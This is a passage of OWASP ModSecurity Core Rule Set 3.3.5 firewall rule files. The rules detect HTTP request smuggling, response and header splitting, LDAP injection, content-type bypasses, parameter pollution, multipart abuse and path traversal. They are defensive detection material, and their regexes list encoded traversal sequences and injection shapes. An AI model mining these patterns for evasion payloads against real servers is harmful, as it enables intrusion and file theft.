# This is a new rule at paranoia level 4. We expect quite a few false positives
# for this rule and we will later evaluate if the rule makes any sense at all.
# The rule is redundant with 920273 and 920274 in PL4. But if the rule proves
# to be useful and false positives remain at a reasonable level, then it might
# be shifted to PL3 in a future release, where it would be the only rule
# covering the backslash escape.
#
# We forbid backslashes followed by a list of basic ascii characters - unless
# the backslash is preceded by another backslash.
# # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \ "id:920460,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ log,\ msg:'Abnormal character escapes in request',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" modsecurity-crs-3.3.5/rules/REQUEST-921-PROTOCOL-ATTACK.conf000066400000000000000000000406501446122515100225320ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. 
# ------------------------------------------------------------------------

#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#


# Skip the rest of this file (up to the END marker) in both phases when the
# executing paranoia level is below 1.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#

#
# -=[ HTTP Request Smuggling ]=-
#
# [ Rule Logic ]
# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character.
# This would point to an attempt to inject a 2nd request into the request, thus bypassing
# tests carried out on the primary request.
#
# The match runs on argument names and values, the request body and XML
# content after URL-decoding, HTML-entity decoding and lowercasing.
# NOTE(review): 'propatch' in the method list looks like a misspelling of the
# WebDAV method PROPPATCH. The unanchored 'patch' alternative still matches
# that method name, so detection appears unaffected - confirm before editing
# the expression.
#
# [ References ]
# http://projects.webappsec.org/HTTP-Request-Smuggling
#
SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \
    "id:921110,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
    msg:'HTTP Request Smuggling Attack',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/33',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# -=[ HTTP Response Splitting ]=-
#
# [ Rule Logic ]
# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
# These characters may cause problems if the data is returned in a response header and
# may be interpreted by an intermediary proxy server and treated as two separate
# responses.
# # [ References ] # http://projects.webappsec.org/HTTP-Response-Splitting # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \ "id:921120,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ "id:921130,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Header Injection ]=- # # [ Rule Logic ] # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters, # on their own or in combination with header field names. # These characters may cause problems if the data is returned in a response header # and interpreted by the client. # The rules are similar to rules defending against the HTTP Request Splitting and # Request Smuggling rules. 
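#
# [ References ]
# https://en.wikipedia.org/wiki/HTTP_header_injection
#
# 921140: flags a CR or LF in any request header name or value, after HTML
# entity decoding.
SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
    "id:921140,\
    phase:2,\
    block,\
    capture,\
    t:none,t:htmlEntityDecode,\
    msg:'HTTP Header Injection Attack via headers',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/273',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# Detect newlines in argument names.
# Checking for GET arguments has been moved to paranoia level 2 (921151)
# in order to mitigate possible false positives.
#
# This rule is also triggered by the following exploit(s):
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
SecRule ARGS_NAMES "@rx [\n\r]" \
    "id:921150,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:htmlEntityDecode,\
    msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/33',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# 921160: flags CR/LF followed by whitespace or a known header name and a
# colon in GET argument names and values.
# The input is lowercased (t:lowercase) before matching and the pattern has no
# (?i) flag, so every header name in the pattern must be written in lower
# case. "originating-ip" was previously spelled "originating-IP" and could
# therefore never match.
SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-ip))\s*:" \
    "id:921160,\
    phase:1,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
    msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/33',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# -=[ HTTP Splitting ]=-
#
# This rule detects \n or \r in the REQUEST FILENAME
# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
# "capture" is set so that %{TX.0} in logdata holds the data matched by this
# rule; without it the log entry would not show this rule's match.
SecRule REQUEST_FILENAME "@rx [\n\r]" \
    "id:921190,\
    phase:1,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,\
    msg:'HTTP Splitting (CR/LF in request filename detected)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/34',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ LDAP Injection ]=-
#
# [ Rule Logic ]
#
# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada
# and regex writing by Denis Kolegov.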
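#
# [ References ]
# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660
#
# 921200: inspects cookies (except names matching /__utm/), cookie names,
# argument names and values, and XML content after HTML entity decoding.
# The rule adds to tx.anomaly_score_pl1, so it carries the
# 'paranoia-level/1' tag like the other paranoia level 1 rules in this file.
# NOTE(review): unlike its neighbours this rule sets no 'attack-*' tag and
# does not add to tx.http_violation_score - confirm that is intended.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \
    "id:921200,\
    phase:2,\
    block,\
    capture,\
    t:none,t:htmlEntityDecode,\
    msg:'LDAP Injection Attack',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-ldap',\
    tag:'platform-multi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/136',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ Body Processor Bypass ]=-
#
# [ Rule Logic ]
#
# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration.
# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used.
#
# Regular expression generated from util/regexp-assemble/data/921421.data.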
# To update the regular expression run the following shell script
# (consult util/regexp-assemble/README.md for details):
#   util/regexp-assemble/regexp-assemble.py update 921421
#
# 921421: on the lowercased Content-Type header, matches when the first token
# is followed by a separator (';', whitespace or ',') and, later in the
# header, an XML media type (application/xml, application/soap+xml, text/xml)
# or a JSON media type (application/json, application/...+json) appears.
SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?(?:(?:application(?:\/soap\+|\/)|text\/)xml|application\/(?:.+[+])?json)" \
    "id:921421,\
    phase:1,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Content-Type header: Dangerous content type outside the mime type declaration',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153',\
    tag:'PCI/12.1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# When the executing paranoia level is below 2, skip to the
# END-REQUEST-921-PROTOCOL-ATTACK marker (one skip rule per phase, 1 and 2).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
# Detect newlines in GET argument values.
# These may point to a HTTP header injection attack, but can also sometimes
# occur in benign query parameters.
#
# See also: rule 921140, 921150
#
SecRule ARGS_GET "@rx [\n\r]" \
    "id:921151,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:htmlEntityDecode,\
    msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/2',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220/33',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

#
# -=[ Body Processor Bypass ]=-
#
# [ Rule Logic ]
#
# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration.
#
# [ References ]
# * See rule 921421
#
# Regular expression generated from util/regexp-assemble/data/921422.data.
# To update the regular expression run the following shell script
# (consult util/regexp-assemble/README.md for details):
#   util/regexp-assemble/regexp-assemble.py update 921422
#
# 921422: broader variant of 921421. After the first token and a separator,
# any of the listed media type words, a top-level type (text, multipart,
# application) or a '/' or '+' character in the rest of the header matches.
SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?\b(?:(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)|(text|multipart|application)|(\/|\+))\b" \
    "id:921422,\
    phase:1,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Content-Type header: Dangerous content type outside the mime type declaration',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/2',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153',\
    tag:'PCI/12.1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

# When the executing paranoia level is below 3, skip to the
# END-REQUEST-921-PROTOCOL-ATTACK marker (one skip rule per phase, 1 and 2).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
#
# Forbid Request Range Header
#
# It is possible to abuse the HTTP Request Range Header to leak error pages
# and other information in very small snippets.
# The easiest way to fight this is to deny the use of this header.
# This is a viable option since the header is only used in rare circumstances
# anymore.
# If it is necessary to use it in a certain setup, then it is best to
# create a rule exclusion for a given URI and this rule ID as a workaround.
#
# The rule counts Range headers (&REQUEST_HEADERS:Range) and matches on any
# request that carries one, whatever its value.
SecRule &REQUEST_HEADERS:Range "@gt 0" \
    "id:921230,\
    phase:1,\
    block,\
    t:none,\
    msg:'HTTP Range Header detected',\
    logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'paranoia-level/3',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/272/220',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"

# -=[ HTTP Parameter Pollution ]=-
#
# [ Rule Logic ]
# These rules look for multiple parameters with the same name.
# 921170 counts the occurrences of the individual parameters.
# 921180 checks if any counter is > 1.
#
# One HPP attack vector is to try to evade signature filters by distributing the
# attack payload across multiple parameters with the same name.
# This works as many security devices only apply signatures to individual
# parameter payloads, however the back-end web application may (in the case
# of ASP.NET) consolidate all of the payloads into one thus making the
# attack payload active.
#
# [ References ]
# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html
# https://capec.mitre.org/data/definitions/460.html
#
# 921170: silent helper (pass, nolog). For every non-empty argument name it
# increments the transaction variable TX.paramcounter_<matched variable name>.
SecRule ARGS_NAMES "@rx ." \
    "id:921170,\
    phase:2,\
    pass,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/137/15/460',\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"

# 921180: matches when any counter set by 921170 exceeds 1. The chained rule
# captures the counter name suffix into TX.1 (used in msg) and raises the
# scores. The disruptive action is "pass"; the rule only adds to the scores.
SecRule TX:/paramcounter_.*/ "@gt 1" \
    "id:921180,\
    phase:2,\
    pass,\
    msg:'HTTP Parameter Pollution (%{TX.1})',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/137/15/460',\
    tag:'paranoia-level/3',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
        "capture,\
        setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"

# When the executing paranoia level is below 4, skip to the
# END-REQUEST-921-PROTOCOL-ATTACK marker (one skip rule per phase, 1 and 2).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
# Target of the skipAfter actions above.
SecMarker "END-REQUEST-921-PROTOCOL-ATTACK"
modsecurity-crs-3.3.5/rules/REQUEST-922-MULTIPART-ATTACK.conf000066400000000000000000000106021446122515100226450ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# This file is to address the 3UWMWA6W vulnerability.
# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports
# of the security fixes in these versions) or a compatible engine supporting these changes.
#
# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start.
# In that case, you can temporarily delete this file. However, you will be missing
# protection from these rules. Therefore, we recommend upgrading your engine instead.
# The rules in this file will be part of the 920 / 921 in the future.
# Only allow specific charsets when using "_charset_"
# Note: this is in phase:2 because these are headers that come in the body
#
# 922100: fires when a multipart part header "_charset_" is present and the
# lowercased ARGS:_charset_ value is not within the configurable list
# tx.allowed_request_content_type_charset.
SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
    "id:922100,\
    phase:2,\
    block,\
    t:none,\
    msg:'Multipart content type global _charset_ definition is not allowed by policy',\
    logdata:'Matched Data: %{ARGS._charset_}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-multipart-header',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \
        "t:lowercase,\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# Only allow specific charsets same as Rule 920600
# Note: this is in phase:2 because these are headers that come in the body
#
# 922110: captures the value of each multipart part "content-type" header and
# fires when that value does NOT match the allow pattern in the chained rule.
# The accepted charset values are written into the pattern itself
# (iso-8859-1, iso-8859-15, windows-1252, utf-8); unlike 922100 this rule does
# not read tx.allowed_request_content_type_charset, so changing that setting
# does not change what 922110 accepts.
SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*+:\s*+(.*)$" \
    "id:922110,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Illegal MIME Multipart Header content-type: charset parameter',\
    logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-protocol',\
    tag:'OWASP_CRS',\
    tag:'capec/272/220',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule TX:1 "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \
        "t:lowercase,\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7)
# Note: this is in phase:2 because these are headers that come in the body
#
# 922120: fires on any lowercased multipart part header that contains
# "content-transfer-encoding:" (the pattern is not anchored).
SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
    "id:922120,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\
    logdata:'Matched Data: %{TX.0}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-deprecated-header',\
    tag:'OWASP_CRS',\
    tag:'capec/272/220',\
    tag:'paranoia-level/1',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
modsecurity-crs-3.3.5/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf000066400000000000000000000136141446122515100234440ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# When the executing paranoia level is below 1, skip to the
# END-REQUEST-930-APPLICATION-ATTACK-LFI marker (one skip rule per phase).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Directory Traversal Attacks ]=-
#
# Ref: https://github.com/wireghoul/dotdotpwn
#
# [ Encoded /../ Payloads ]
#
# 930100: applies no transformation (t:none) and reads the raw request URI,
# so the pattern itself lists the encoded forms of the path separator and of
# the dot. It matches separator, two dots, separator, case-insensitively.
# The Referer header is excluded from the inspected headers.
SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \
    "id:930100,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Path Traversal Attack (/../)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
